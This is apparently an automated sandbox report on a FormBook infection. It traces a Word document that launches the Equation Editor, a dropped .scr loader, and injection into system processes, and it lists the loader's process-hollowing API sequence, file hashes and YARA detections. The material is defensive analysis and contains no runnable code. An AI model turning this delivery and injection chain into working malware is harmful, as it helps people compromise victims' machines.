                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:02:53:33
                                Start date:20/05/2024
                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                Imagebase:0x13fe50000
                                File size:1'423'704 bytes
                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:2
                                Start time:02:53:34
                                Start date:20/05/2024
                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                Imagebase:0x400000
                                File size:543'304 bytes
                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:02:53:41
                                Start date:20/05/2024
                                Path:C:\Users\user\AppData\Roaming\loud89334.scr
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\loud89334.scr"
                                Imagebase:0xab0000
                                File size:1'273'344 bytes
                                MD5 hash:ED7336086B1E5267C0D4863325956BE2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000005.00000002.370449287.0000000004C80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 16%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:6
                                Start time:02:53:41
                                Start date:20/05/2024
                                Path:C:\Users\user\AppData\Roaming\loud89334.scr
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\loud89334.scr"
                                Imagebase:0xab0000
                                File size:1'273'344 bytes
                                MD5 hash:ED7336086B1E5267C0D4863325956BE2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.407188357.0000000000190000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.407188357.0000000000190000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.407506842.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.407506842.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:7
                                Start time:02:53:56
                                Start date:20/05/2024
                                Path:C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe"
                                Imagebase:0x1390000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:8
                                Start time:02:53:57
                                Start date:20/05/2024
                                Path:C:\Windows\SysWOW64\dfrgui.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\dfrgui.exe"
                                Imagebase:0x390000
                                File size:586'752 bytes
                                MD5 hash:FB036244DBD2FADC225AD8650886B641
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.635052346.0000000000250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.635052346.0000000000250000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.634933640.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.634933640.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.634993133.0000000000150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.634993133.0000000000150000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:false

                                General

                                Target ID:9
                                Start time:02:54:01
                                Start date:20/05/2024
                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                Imagebase:0x400000
                                File size:543'304 bytes
                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:12
                                Start time:02:54:09
                                Start date:20/05/2024
                                Path:C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe"
                                Imagebase:0x1390000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.635242428.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.635242428.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:14
                                Start time:02:54:31
                                Start date:20/05/2024
                                Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x130000
                                File size:517'064 bytes
                                MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.479085527.0000000002AB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.479085527.0000000002AB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:35.2%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:27.8%
                                  Total number of Nodes:36
                                  Total number of Limit Nodes:1
                                  execution_graph 4263 304bd0 4264 304c5d CreateProcessW 4263->4264 4266 304db6 4264->4266 4267 305000 ReadProcessMemory 4268 3050bf 4267->4268 4269 303fe0 4271 303ffa 4269->4271 4270 30404a 4271->4270 4273 304090 4271->4273 4274 3040d3 4273->4274 4289 303dc9 4274->4289 4293 303dd0 4274->4293 4275 3045a1 4297 303c78 4275->4297 4276 304880 4285 303c78 WriteProcessMemory 4276->4285 4277 304685 4277->4276 4281 303c78 WriteProcessMemory 4277->4281 4278 3048be 4279 3049a6 4278->4279 4301 303b50 4278->4301 4305 303ee8 4279->4305 4309 303ef0 4279->4309 4280 304a63 4280->4271 4281->4277 4285->4278 4290 303e14 VirtualAllocEx 4289->4290 4292 303e8c 4290->4292 4292->4275 4294 303e14 VirtualAllocEx 4293->4294 4296 303e8c 4294->4296 4296->4275 4298 303cc4 WriteProcessMemory 4297->4298 4300 303d5d 4298->4300 4300->4277 4302 303b99 Wow64SetThreadContext 4301->4302 4304 303c11 4302->4304 4304->4279 4306 303f34 ResumeThread 4305->4306 4308 303f80 4306->4308 4308->4280 4310 303f34 ResumeThread 4309->4310 4312 303f80 4310->4312 4312->4280

                                  Executed Functions

                                  Function 00304090 Relevance: 1.9, Strings: 1, Instructions: 623COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 900 304090-3040d1 901 3040d3 900->901 902 3040d8-30425e 900->902 901->902 909 304260-304284 902->909 910 304285-3042ca call 30377c 902->910 909->910 914 3042f3-30435d 910->914 915 3042cc-3042e8 910->915 921 304364-304390 914->921 922 30435f 914->922 915->914 924 3043f1-304423 call 303794 921->924 925 304392-30439f call 303788 921->925 922->921 932 304425-304441 924->932 933 30444c 924->933 928 3043a4-3043c4 925->928 930 3043c6-3043e2 928->930 931 3043ed-3043ef 928->931 930->931 934 30444d-304457 931->934 932->933 933->934 937 304459 934->937 938 30445e-3044a4 call 3037a0 934->938 937->938 943 3044a6-3044c2 938->943 944 3044cd-3044e6 938->944 943->944 945 3044e8-304514 call 3037ac 944->945 946 30453e-30459c 944->946 952 304516-304532 945->952 953 30453d 945->953 1028 30459f call 303dd0 946->1028 1029 30459f call 303dc9 946->1029 952->953 953->946 956 3045a1-3045b6 957 3045b8-3045c9 956->957 958 3045cb-3045cd 956->958 960 3045d3-3045e7 957->960 958->960 961 304624-30463b 960->961 962 3045e9-304623 960->962 963 304664-3046a5 call 303c78 961->963 964 30463d-304659 961->964 962->961 968 3046a7-3046c3 963->968 969 3046ce-304703 963->969 964->963 968->969 973 30485b-30487a 969->973 974 304880-3048de call 303c78 973->974 975 304708-30478c 973->975 981 3048e0-3048fc 974->981 982 304907-30493a 974->982 985 304850-304855 975->985 986 304792-304804 call 303c78 975->986 981->982 988 304944-304957 982->988 989 30493c-304943 982->989 985->973 999 304806-304826 986->999 990 304959 988->990 991 30495e-304989 988->991 989->988 990->991 996 3049f3-304a25 call 3037b8 991->996 997 30498b-3049a4 call 303b50 991->997 1004 304a27-304a43 996->1004 1005 304a4e 996->1005 1001 3049a6-3049c6 997->1001 1002 304828-304844 999->1002 1003 30484f 999->1003 1006 3049c8-3049e4 1001->1006 1007 3049ef-3049f1 1001->1007 1002->1003 1003->985 1004->1005 1008 304a4f-304a5e 1005->1008 1006->1007 1007->1008 1024 304a61 call 303ef0 1008->1024 1025 304a61 call 303ee8 1008->1025 1012 304a63-304a83 1014 304a85-304aa1 1012->1014 1015 304aac-304bb5 1012->1015 1014->1015 1024->1012 1025->1012 1028->956 1029->956
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369968397.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_300000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (
                                  • API String ID: 0-3887548279
                                  • Opcode ID: ebe76ee9b92ad33c90f842acaa65ce89c17a78f6e00145931b1dfb8989a289d8
                                  • Instruction ID: cdda2115b56efda9913c2bec42c3a195c1a55e787985440a017544aaac8be1e7
                                  • Opcode Fuzzy Hash: ebe76ee9b92ad33c90f842acaa65ce89c17a78f6e00145931b1dfb8989a289d8
                                  • Instruction Fuzzy Hash: 7E52F274E012289FDB65DF65C894BEDBBB2BF89301F1481EAD409AB291DB345E85CF40
                                  Function 00304BD0 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1030 304bd0-304c5b 1031 304c72-304c80 1030->1031 1032 304c5d-304c6f 1030->1032 1033 304c82-304c94 1031->1033 1034 304c97-304cd3 1031->1034 1032->1031 1033->1034 1035 304cd5-304ce4 1034->1035 1036 304ce7-304db4 CreateProcessW 1034->1036 1035->1036 1040 304db6-304dbc 1036->1040 1041 304dbd-304e7c 1036->1041 1040->1041 1051 304eb2-304ebd 1041->1051 1052 304e7e-304ea7 1041->1052 1052->1051
                                  APIs
                                  • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00304DA1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369968397.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_300000_loud89334.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 4482ca1f6ecfd6a90ecf8b069c972e6b85f8cc0c00273c90ff568671c3659a87
                                  • Instruction ID: c8c8a10aafbfd93f1d1cfc191e71601f483eba75f02ab9785c550a3b63e07561
                                  • Opcode Fuzzy Hash: 4482ca1f6ecfd6a90ecf8b069c972e6b85f8cc0c00273c90ff568671c3659a87
                                  • Instruction Fuzzy Hash: 6881D1B4C01259DFDB21CFA9C954BDEBBB5BF09300F1491AAE508B7260DB709A89CF54
                                  Function 00303C78 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1056 303c78-303ce3 1058 303ce5-303cf7 1056->1058 1059 303cfa-303d5b WriteProcessMemory 1056->1059 1058->1059 1061 303d64-303db6 1059->1061 1062 303d5d-303d63 1059->1062 1062->1061
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00303D4B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369968397.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_300000_loud89334.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 8b182611314d25f265c97d2a1892e9534d87a63e232dc04c29c0741d644f5832
                                  • Instruction ID: 4d4ec003eb9b770652219b73c3b19d79a3124ff6cbee78195bef34a33394e6ff
                                  • Opcode Fuzzy Hash: 8b182611314d25f265c97d2a1892e9534d87a63e232dc04c29c0741d644f5832
                                  • Instruction Fuzzy Hash: D241BBB4D012489FCF00CFA9D984AEEFBF1BB49314F20942AE814B7240C334AA45CF64
                                  Function 00304FF9 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1067 304ff9-3050bd ReadProcessMemory 1069 3050c6-305104 1067->1069 1070 3050bf-3050c5 1067->1070 1070->1069
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003050AD
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369968397.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_300000_loud89334.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 1da8b446029e777daa284b0e61fc00c122142f7c6763b4c74e3539fb21ba8dea
                                  • Instruction ID: c2b5d7d67bf009dea078e444788d2e7e5da6fa0b4a71a1fe5057210fd620a654
                                  • Opcode Fuzzy Hash: 1da8b446029e777daa284b0e61fc00c122142f7c6763b4c74e3539fb21ba8dea
                                  • Instruction Fuzzy Hash: A44178B9D052589FCF10CFAAD884AEEFBB1BB09310F24906AE814B7210D375A945CF64
                                  Function 00303DC9 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1073 303dc9-303e8a VirtualAllocEx 1076 303e93-303edd 1073->1076 1077 303e8c-303e92 1073->1077 1077->1076
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00303E7A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369968397.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_300000_loud89334.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 097f091fbbc7ef14c083773bcf5db89d9519ebf92e6027b8f5f458490e41a017
                                  • Instruction ID: ceda7ae92f2d043d022382515f6b971f90f680a567447cca2ba9279cf6e9c5ed
                                  • Opcode Fuzzy Hash: 097f091fbbc7ef14c083773bcf5db89d9519ebf92e6027b8f5f458490e41a017
                                  • Instruction Fuzzy Hash: 3F31ABB9D042489FCF10CFA9E984AEEFBB5AB49310F14942AE815B7350D335A945CF64
                                  Function 00303DD0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1082 303dd0-303e8a VirtualAllocEx 1085 303e93-303edd 1082->1085 1086 303e8c-303e92 1082->1086 1086->1085
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00303E7A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369968397.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_300000_loud89334.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 3ed4f4ef1de438990e9e1fd84f064e80ca303481d64a6741b128affdd98c94e5
                                  • Instruction ID: 60d794aab43ff98cb703a4844cf27ea6a9565361898a746009b392822ef119e6
                                  • Opcode Fuzzy Hash: 3ed4f4ef1de438990e9e1fd84f064e80ca303481d64a6741b128affdd98c94e5
                                  • Instruction Fuzzy Hash: 7C3198B9D002589FCF10CFA9D984AEEFBB5BB49310F20942AE815B7350D735A945CF64
                                  Function 00305000 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1091 305000-3050bd ReadProcessMemory 1092 3050c6-305104 1091->1092 1093 3050bf-3050c5 1091->1093 1093->1092
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003050AD
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369968397.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_300000_loud89334.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 1a98716c90d508d3738971d9ade59f89831148df10ea129c50a48f9d56658138
                                  • Instruction ID: fa5093d8b3f5afd38bc799ffb1e3332d237ca4181e863bcd25693b9c28610325
                                  • Opcode Fuzzy Hash: 1a98716c90d508d3738971d9ade59f89831148df10ea129c50a48f9d56658138
                                  • Instruction Fuzzy Hash: A13167B9D052589FCF10CFAAD984ADEFBB5BB09310F24A02AE814B7310D375A945CF65
                                  Function 00303B50 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1096 303b50-303bb0 1098 303bb2-303bc4 1096->1098 1099 303bc7-303c0f Wow64SetThreadContext 1096->1099 1098->1099 1101 303c11-303c17 1099->1101 1102 303c18-303c64 1099->1102 1101->1102
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00303BFF
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369968397.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_300000_loud89334.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 1f38af597364e92495039c82d4a3d0807eca4e356821c4d17d1af997307a1ff6
                                  • Instruction ID: de0ba98608f46f2cfa2c919517b5b25368c9fcb7001ad07565b3c3b09f3a3cf8
                                  • Opcode Fuzzy Hash: 1f38af597364e92495039c82d4a3d0807eca4e356821c4d17d1af997307a1ff6
                                  • Instruction Fuzzy Hash: 2E31BEB4D012589FDB10CFA9D984AEEFFF5AF49314F24842AE414B7240C778AA45CF54
                                  Function 00303EE8 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1107 303ee8-303f7e ResumeThread 1110 303f80-303f86 1107->1110 1111 303f87-303fc9 1107->1111 1110->1111
                                  APIs
                                  • ResumeThread.KERNELBASE(?), ref: 00303F6E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369968397.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_300000_loud89334.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 3e727c409e5b59b34c9d99a4c66d9442b0d66a0c5d25e7311f417c54778d683f
                                  • Instruction ID: e1b1f13b7587874fbab98fbd9ddeb53bcbd9e403ef6e0c5ad4c2d3ad238b330f
                                  • Opcode Fuzzy Hash: 3e727c409e5b59b34c9d99a4c66d9442b0d66a0c5d25e7311f417c54778d683f
                                  • Instruction Fuzzy Hash: 8631FDB4D012089FCF10CFA9E884AEEFBB5AF49314F24942AE814B7350C734A905CF94
                                  Function 00303EF0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1116 303ef0-303f7e ResumeThread 1119 303f80-303f86 1116->1119 1120 303f87-303fc9 1116->1120 1119->1120
                                  APIs
                                  • ResumeThread.KERNELBASE(?), ref: 00303F6E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369968397.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_300000_loud89334.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 5a31488c42d6274b1cafce00008ee065b2d4238ef510c840381d66ae010d1b5e
                                  • Instruction ID: a1b2c1c3d2e7fbfeef0b1856f0f6ec2462105e34bcf1eb2071283aeb73871c00
                                  • Opcode Fuzzy Hash: 5a31488c42d6274b1cafce00008ee065b2d4238ef510c840381d66ae010d1b5e
                                  • Instruction Fuzzy Hash: AF31DDB4D012099FCF10CFA9D984AEEFBB5AF49314F20942AE814B7340C734A905CFA4
                                  Function 001CD01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369488511.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1cd000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 73422e038d2d0e4f5e722b536799c2fee7eedd662e0fb64731330d9af40bf056
                                  • Instruction ID: 2446ae9d3a612b1c349afd3d13331e462045d33a89eee71fd6583663ff162417
                                  • Opcode Fuzzy Hash: 73422e038d2d0e4f5e722b536799c2fee7eedd662e0fb64731330d9af40bf056
                                  • Instruction Fuzzy Hash: 2F21AF75604240AFDB15CF18E884F26BBA5EB94314F24C5BDE84A4B246C736D857CBA2
                                  Function 001CD1E8 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369488511.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1cd000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 36023491df9da8a9078c10d85df9045e2bbec03cf8f39f0be8ef2f95a87064f9
                                  • Instruction ID: 58189f79c820ca870d1064dd235c5fa615cd3ee1b32679d1bfa9e1b4fd50d757
                                  • Opcode Fuzzy Hash: 36023491df9da8a9078c10d85df9045e2bbec03cf8f39f0be8ef2f95a87064f9
                                  • Instruction Fuzzy Hash: BB21D0B5604240AFDB15CF54E8C4F26BBA5EBA4314F24C57DE8094B246C336D846CBA1
                                  Function 001CD006 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369488511.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1cd000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2049c9f2fcaa8303ed86d1b6b569958068252656f0d092f716e8843d05b4d183
                                  • Instruction ID: 40243f35f3ee0dc20529e0be10ecde11bb68e2a8f454aea6b0cfb4c186990162
                                  • Opcode Fuzzy Hash: 2049c9f2fcaa8303ed86d1b6b569958068252656f0d092f716e8843d05b4d183
                                  • Instruction Fuzzy Hash: 4C2180755083809FDB02CF14D994B15BF71EB56314F28C5EAD8498F267C33AD85ACB62
                                  Function 001CD1E3 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.369488511.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1cd000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                  • Instruction ID: b64302756f4487110dfa8dd33b82c787f1aa86ff9f7ae572158bd9090c7ef6e9
                                  • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                  • Instruction Fuzzy Hash: 7A119D75504280DFDB12CF54E9C4B15BFA1FB94314F28C6AED8494B656C33AD84ACBA1

                                  Execution Graph

                                  Execution Coverage:1.6%
                                  Dynamic/Decrypted Code Coverage:2%
                                  Signature Coverage:14.6%
                                  Total number of Nodes:254
                                  Total number of Limit Nodes:27
